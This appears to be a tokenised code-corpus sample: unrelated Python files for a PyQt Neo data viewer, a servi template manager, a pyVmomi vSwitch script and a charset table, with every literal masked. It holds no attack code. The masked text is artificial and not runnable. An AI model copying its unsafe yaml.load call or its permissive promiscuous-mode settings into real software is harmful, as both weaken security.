) <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionLoad_Data_triggered ( self ) : <EOL> d = DirFilesDialog ( self , '<STR_LIT>' ) <EOL> if not d . exec_ ( ) : <EOL> return <EOL> self . load_files ( d . selectedFiles ( ) ) <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionSave_Data_triggered ( self ) : <EOL> path , io = self . _save_data_dialog ( '<STR_LIT>' ) <EOL> if path is None : <EOL> return <EOL> self . progress . begin ( '<STR_LIT>' ) <EOL> blocks = self . all_neo_blocks ( ) <EOL> self . _save_blocks ( blocks , path , io ) <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionSave_Selected_Data_triggered ( self ) : <EOL> path , io = self . 
_save_data_dialog ( <EOL> '<STR_LIT>' ) <EOL> if path is None : <EOL> return <EOL> self . progress . begin ( '<STR_LIT>' ) <EOL> blocks = self . provider . selection_blocks ( ) <EOL> self . _save_blocks ( blocks , path , io ) <EOL> def _get_writeable_formats ( self ) : <EOL> """<STR_LIT>""" <EOL> filters = [ ] <EOL> d = { } <EOL> for io in neo . io . iolist : <EOL> if not io . is_writable : <EOL> continue <EOL> filters . append ( '<STR_LIT>' % ( <EOL> io . name or io . __name__ , <EOL> '<STR_LIT:U+0020>' . join ( [ '<STR_LIT>' + ext for ext in io . extensions ] ) ) ) <EOL> d [ filters [ - <NUM_LIT:1> ] ] = io <EOL> return filters , d <EOL> def _save_data_dialog ( self , title ) : <EOL> """<STR_LIT>""" <EOL> dialog = QFileDialog ( self , title ) <EOL> dialog . setAcceptMode ( QFileDialog . AcceptSave ) <EOL> name_filters , io_mapping = self . _get_writeable_formats ( ) <EOL> dialog . setNameFilters ( name_filters ) <EOL> dialog . setConfirmOverwrite ( True ) <EOL> if not dialog . exec_ ( ) : <EOL> return None , None <EOL> return unicode ( dialog . selectedFiles ( ) [ <NUM_LIT:0> ] ) , io_mapping [ dialog . selectedNameFilter ( ) ] <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionFull_Load_triggered ( self ) : <EOL> NeoDataProvider . data_lazy_mode = <NUM_LIT:0> <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionLazy_Load_triggered ( self ) : <EOL> NeoDataProvider . data_lazy_mode = <NUM_LIT:1> <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionCached_Lazy_Load_triggered ( self ) : <EOL> NeoDataProvider . data_lazy_mode = <NUM_LIT:2> <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionFull_triggered ( self ) : <EOL> NeoDataProvider . cascade_lazy = False <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionLazy_triggered ( self ) : <EOL> NeoDataProvider . cascade_lazy = True <EOL> @ pyqtSignature ( "<STR_LIT:int>" ) <EOL> def on_neoIOComboBox_currentIndexChanged ( self , index ) : <EOL> if index > <NUM_LIT:0> : <EOL> NeoDataProvider . 
forced_io = self . neoIOComboBox . itemData ( index ) <EOL> self . configureIOButton . setEnabled ( <EOL> io_settings . has_ui_params ( NeoDataProvider . forced_io ) ) <EOL> else : <EOL> NeoDataProvider . forced_io = None <EOL> self . configureIOButton . setEnabled ( False ) <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_configureIOButton_pressed ( self ) : <EOL> io = NeoDataProvider . forced_io <EOL> d = io_settings . ParamDialog ( <EOL> io , NeoDataProvider . io_params . get ( io , { } ) , <EOL> self . io_write_params . get ( io , { } ) , self ) <EOL> if d . exec_ ( ) : <EOL> NeoDataProvider . io_params [ io ] = d . get_read_params ( ) <EOL> self . io_write_params [ io ] = d . get_write_params ( ) <EOL> def _execute_remote_plugin ( self , plugin , current = None , selections = None ) : <EOL> sl = list ( ) <EOL> if current is None : <EOL> sl . append ( self . provider_factory ( '<STR_LIT>' , self ) . data_dict ( ) ) <EOL> else : <EOL> d = copy . copy ( current . data_dict ( ) ) <EOL> d [ '<STR_LIT:name>' ] = '<STR_LIT>' <EOL> sl . append ( d ) <EOL> if selections is None : <EOL> selections = self . selections <EOL> for s in selections : <EOL> sl . append ( s . data_dict ( ) ) <EOL> io_plugin_files = [ ] <EOL> transform_path = getattr ( api . config , '<STR_LIT>' , <EOL> lambda x : x ) <EOL> for s in sl : <EOL> if s [ '<STR_LIT:type>' ] != '<STR_LIT>' : <EOL> continue <EOL> for b in s [ '<STR_LIT>' ] : <EOL> if len ( b ) > <NUM_LIT:2> : <EOL> io = NeoDataProvider . find_io_class ( b [ <NUM_LIT:2> ] ) <EOL> if io is None : <EOL> raise NameError ( '<STR_LIT>' <EOL> '<STR_LIT>' % b [ <NUM_LIT:2> ] ) <EOL> if getattr ( io , '<STR_LIT>' , False ) : <EOL> io_plugin_files . append ( io . _python_file ) <EOL> b [ <NUM_LIT:1> ] = transform_path ( b [ <NUM_LIT:1> ] ) <EOL> selections = json . dumps ( sl , sort_keys = True , indent = <NUM_LIT:2> ) <EOL> config = pickle . dumps ( plugin . get_parameters ( ) ) <EOL> name = type ( plugin ) . __name__ <EOL> path = plugin . 
source_file <EOL> self . send_plugin_info ( name , path , selections , config , io_plugin_files ) <EOL> def closeEvent ( self , event ) : <EOL> super ( MainWindowNeo , self ) . closeEvent ( event ) <EOL> NeoDataProvider . clear ( ) </s>
<s> from datetime import datetime <EOL> import re <EOL> import shutil <EOL> import os <EOL> from logging import debug <EOL> import yaml <EOL> from servi . manifest import Manifest <EOL> from servi . exceptions import ServiError , ForceError <EOL> from servi . utils import file_exists , pathfor <EOL> import servi . config as c <EOL> BACKUP_PREFIX = '<STR_LIT>' <EOL> class TemplateManager ( object ) : <EOL> def __init__ ( self , raw_template_playbook = None ) : <EOL> self . m_master = None <EOL> self . m_master_saved = None <EOL> self . m_template = None <EOL> self . master_playbook_exists = ForceError <EOL> self . t_added = set ( ) <EOL> self . t_changed = set ( ) <EOL> self . t_removed = set ( ) <EOL> self . t_mod = set ( ) <EOL> self . t_mod_but_ignored = set ( ) <EOL> self . m_added = set ( ) <EOL> self . m_changed = set ( ) <EOL> self . m_removed = set ( ) <EOL> self . m_mod = set ( ) <EOL> self . m_mod_but_ignored = set ( ) <EOL> self . roles = set ( ) <EOL> self . possible_roles = set ( ) <EOL> self . modified_possible_roles = set ( ) <EOL> self . role_of_fname = None <EOL> self . timestamp = datetime . utcnow ( ) <EOL> self . raw_template_playbook = raw_template_playbook <EOL> self . m_master = Manifest ( c . MASTER ) <EOL> self . m_template = Manifest ( c . TEMPLATE ) <EOL> self . update_tmgr ( ) <EOL> def update_tmgr ( self ) : <EOL> try : <EOL> self . m_master_saved = Manifest ( c . MASTER , load = True ) <EOL> except FileNotFoundError : <EOL> self . m_master_saved = None <EOL> self . master_playbook_exists = file_exists ( <EOL> pathfor ( '<STR_LIT>' , c . MASTER ) ) <EOL> self . t_added , self . t_changed , self . t_removed = Manifest . diff_files ( self . m_master , self . m_template ) <EOL> self . t_mod = self . t_changed | self . t_removed <EOL> self . t_mod_but_ignored = self . ignored_files ( self . t_mod ) <EOL> if self . m_master_saved : <EOL> self . m_added , self . m_changed , self . m_removed = Manifest . diff_files ( self . m_master , self . 
m_master_saved ) <EOL> self . m_mod = self . m_changed | self . m_removed <EOL> self . m_mod_but_ignored = self . ignored_files ( <EOL> self . m_mod ) <EOL> else : <EOL> self . m_added , self . m_changed , self . m_removed , self . m_mod , self . m_mod_but_ignored = set ( ) , set ( ) , set ( ) , set ( ) , set ( ) <EOL> rm = RoleManager ( self . t_changed , self . raw_template_playbook ) <EOL> self . roles = rm . roles <EOL> self . possible_roles = rm . possible_roles <EOL> self . modified_possible_roles = rm . modified_possible_roles <EOL> self . role_of_fname = rm . role_of_fname <EOL> def init_master ( self , exclude_files = None ) : <EOL> if exclude_files is None : <EOL> exclude_files = [ ] <EOL> self . copy_files ( exclude_files = exclude_files ) <EOL> def update_master ( self ) : <EOL> self . copy_files ( exclude_files = self . t_mod_but_ignored ) <EOL> @ staticmethod <EOL> def rename_master_file ( fname , timestamp ) : <EOL> """<STR_LIT>""" <EOL> backupdir = '<STR_LIT>' . format ( BACKUP_PREFIX , timestamp . isoformat ( ) ) <EOL> if not os . path . exists ( backupdir ) : <EOL> os . mkdir ( backupdir ) <EOL> subdir = os . path . join ( backupdir , os . path . dirname ( fname ) ) <EOL> if not os . path . exists ( subdir ) : <EOL> os . makedirs ( subdir ) <EOL> shutil . move ( pathfor ( fname , c . MASTER ) , subdir ) <EOL> def copy_files ( self , exclude_files ) : <EOL> for fname , template_hash in self . m_template . manifest [ "<STR_LIT>" ] . items ( ) : <EOL> template_fname = pathfor ( fname , c . TEMPLATE ) <EOL> master_fname = pathfor ( fname , c . MASTER ) <EOL> if ( self . m_master . manifest [ "<STR_LIT>" ] [ fname ] == <EOL> template_hash ) : <EOL> continue <EOL> if fname in exclude_files : <EOL> continue <EOL> _cur_role = self . role_of_fname ( fname ) <EOL> if ( _cur_role and self . master_playbook_exists <EOL> and _cur_role not in self . roles ) : <EOL> debug ( '<STR_LIT>' <EOL> . format ( fname ) ) <EOL> continue <EOL> if fname == c . 
SERVIFILE_GLOBAL : <EOL> master_fname = c . SERVIFILE_GLOBAL_FULL <EOL> if ( os . path . split ( fname ) [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> and os . path . isfile ( template_fname ) ) : <EOL> debug ( '<STR_LIT>' <EOL> . format ( fname ) ) <EOL> continue <EOL> if file_exists ( master_fname ) : <EOL> self . rename_master_file ( fname , self . timestamp ) <EOL> existing = True <EOL> else : <EOL> existing = False <EOL> destdir = os . path . dirname ( master_fname ) <EOL> if destdir and not os . path . exists ( destdir ) : <EOL> os . makedirs ( destdir ) <EOL> shutil . copy2 ( template_fname , master_fname ) <EOL> if existing : <EOL> debug ( '<STR_LIT>' . format ( master_fname ) ) <EOL> else : <EOL> debug ( '<STR_LIT>' . format ( master_fname ) ) <EOL> m = Manifest ( c . MASTER ) <EOL> m . save ( ) <EOL> self . update_tmgr ( ) <EOL> return True <EOL> @ staticmethod <EOL> def ignored_files ( files ) : <EOL> """<STR_LIT>""" <EOL> ignore_list = c . SERVI_IGNORE_FILES <EOL> ignore_re_string = '<STR_LIT:(>' + '<STR_LIT:|>' . join ( ignore_list ) + '<STR_LIT:)>' <EOL> ignore_re = re . compile ( ignore_re_string ) <EOL> ignored = { file for file in files if ignore_re . search ( file ) } <EOL> return ignored <EOL> class RoleManager ( object ) : <EOL> def __init__ ( self , changed_files , raw_template_playbook = None ) : <EOL> self . roles , self . possible_roles = self . _get_master_roles ( <EOL> self . _get_template_roles ( ) , raw_template_playbook ) <EOL> self . modified_possible_roles = self . _get_modified_possible_roles ( <EOL> changed_files , self . possible_roles ) <EOL> @ staticmethod <EOL> def role_of_fname ( normalized_fname ) : <EOL> """<STR_LIT>""" <EOL> match = re . search ( '<STR_LIT>' , <EOL> normalized_fname ) <EOL> if not match : <EOL> return None <EOL> else : <EOL> return match . group ( <NUM_LIT:1> ) <EOL> @ staticmethod <EOL> def _get_template_roles ( ) : <EOL> template_dir = os . path . join ( c . 
TMPL_DIR_SITE , '<STR_LIT>' ) <EOL> roles = [ path for path in <EOL> os . listdir ( template_dir ) <EOL> if os . path . isdir ( os . path . join ( template_dir , path ) ) ] <EOL> return set ( roles ) <EOL> @ staticmethod <EOL> def _get_master_roles ( template_roles , test_raw = None ) : <EOL> if test_raw : <EOL> playbook = yaml . load ( test_raw ) <EOL> playbook = playbook [ <NUM_LIT:0> ] <EOL> playbook_raw = test_raw <EOL> else : <EOL> try : <EOL> with open ( pathfor ( '<STR_LIT>' , c . MASTER ) , <EOL> '<STR_LIT:r>' ) as fp : <EOL> playbook = yaml . load ( fp ) <EOL> fp . seek ( <NUM_LIT:0> ) <EOL> playbook = playbook [ <NUM_LIT:0> ] <EOL> playbook_raw = fp . read ( ) <EOL> except FileNotFoundError : <EOL> return set ( ) , set ( ) <EOL> if '<STR_LIT>' not in playbook : <EOL> raise ServiError ( <EOL> '<STR_LIT>' <EOL> . format ( pathfor ( '<STR_LIT>' , c . MASTER ) ) ) <EOL> roles = { role for role in playbook [ '<STR_LIT>' ] if type ( role ) is str } <EOL> roles |= { role [ '<STR_LIT>' ] <EOL> for role in playbook [ '<STR_LIT>' ] if type ( role ) is dict } <EOL> possible_roles = set ( ) <EOL> for t_role in template_roles : <EOL> if re . search ( '<STR_LIT>' . format ( t_role ) , playbook_raw , <EOL> flags = re . IGNORECASE | re . MULTILINE ) : <EOL> possible_roles . add ( t_role ) <EOL> return roles , possible_roles <EOL> @ staticmethod <EOL> def _get_modified_possible_roles ( changed_files , possible_roles ) : <EOL> retval = set ( ) <EOL> for fname in changed_files : <EOL> role = RoleManager . role_of_fname ( fname ) <EOL> if role in possible_roles : <EOL> retval |= { role } <EOL> return retval </s>
<s> '''<STR_LIT>''' <EOL> import atexit <EOL> from pyVmomi import vim , vmodl <EOL> from pyVim import connect <EOL> from pyVim . connect import Disconnect <EOL> inputs = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def get_obj ( content , vimtype , name ) : <EOL> """<STR_LIT>""" <EOL> obj = None <EOL> container = content . viewManager . CreateContainerView ( content . rootFolder , vimtype , True ) <EOL> for c in container . view : <EOL> if c . name == name : <EOL> obj = c <EOL> break <EOL> return obj <EOL> def create_vswitch ( host_network_system , vss_name , num_ports , nic_name ) : <EOL> vss_spec = vim . host . VirtualSwitch . Specification ( ) <EOL> vss_spec . numPorts = num_ports <EOL> vss_spec . bridge = vim . host . VirtualSwitch . BondBridge ( nicDevice = [ nic_name ] ) <EOL> host_network_system . AddVirtualSwitch ( vswitchName = vss_name , spec = vss_spec ) <EOL> print "<STR_LIT>" , vss_name <EOL> def create_port_group ( host_network_system , pg_name , vss_name ) : <EOL> port_group_spec = vim . host . PortGroup . Specification ( ) <EOL> port_group_spec . name = pg_name <EOL> port_group_spec . vlanId = <NUM_LIT:0> <EOL> port_group_spec . vswitchName = vss_name <EOL> security_policy = vim . host . NetworkPolicy . SecurityPolicy ( ) <EOL> security_policy . allowPromiscuous = True <EOL> security_policy . forgedTransmits = True <EOL> security_policy . macChanges = False <EOL> port_group_spec . policy = vim . host . NetworkPolicy ( security = security_policy ) <EOL> host_network_system . AddPortGroup ( portgrp = port_group_spec ) <EOL> print "<STR_LIT>" , pg_name <EOL> def add_virtual_nic ( host_network_system , pg_name ) : <EOL> vnic_spec = vim . host . VirtualNic . Specification ( ) <EOL> vnic_spec . ip = vim . host . 
IpConfig ( dhcp = True ) <EOL> vnic_spec . mac = '<STR_LIT>' <EOL> host_network_system . AddServiceConsoleVirtualNic ( portgroup = pg_name , nic = vnic_spec ) <EOL> def main ( ) : <EOL> try : <EOL> si = None <EOL> try : <EOL> print "<STR_LIT>" <EOL> si = connect . Connect ( inputs [ '<STR_LIT>' ] , <NUM_LIT> , inputs [ '<STR_LIT>' ] , inputs [ '<STR_LIT>' ] , version = "<STR_LIT>" ) <EOL> except IOError , e : <EOL> pass <EOL> atexit . register ( Disconnect , si ) <EOL> print "<STR_LIT>" <EOL> content = si . RetrieveContent ( ) <EOL> host = get_obj ( content , [ vim . HostSystem ] , inputs [ '<STR_LIT>' ] ) <EOL> host_network_system = host . configManager . networkSystem <EOL> create_vswitch ( host_network_system , inputs [ '<STR_LIT>' ] , inputs [ '<STR_LIT>' ] , inputs [ '<STR_LIT>' ] ) <EOL> create_port_group ( host_network_system , inputs [ '<STR_LIT>' ] , inputs [ '<STR_LIT>' ] ) <EOL> except vmodl . MethodFault , e : <EOL> print "<STR_LIT>" % e . msg <EOL> return <NUM_LIT:1> <EOL> except Exception , e : <EOL> print "<STR_LIT>" % str ( e ) <EOL> return <NUM_LIT:1> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import os <EOL> import sys <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> from exc import * </s>
<s> app . sessions . ttl = <NUM_LIT:10> </s>
<s> '''<STR_LIT>''' <EOL> charsets = { <EOL> ur '<STR_LIT:ascii>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur 
'<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' 
: ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur 
'<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT:all>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT:all>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT>' : ur '<STR_LIT:all>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT:all>' } , <EOL> ur '<STR_LIT>' : { ur 
'<STR_LIT:description>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT:description>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT:description>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT:description>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT>' : ur '<STR_LIT>' , ur '<STR_LIT:description>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT:description>' : ur '<STR_LIT>' } , <EOL> ur '<STR_LIT>' : { ur '<STR_LIT:description>' : ur '<STR_LIT>' } , <EOL> } <EOL> '''<STR_LIT>''' <EOL> import codecs <EOL> for k in charsets . keys ( ) : <EOL> try : <EOL> codecs . lookup ( k ) <EOL> except LookupError : <EOL> del charsets [ k ] <EOL> del k </s>
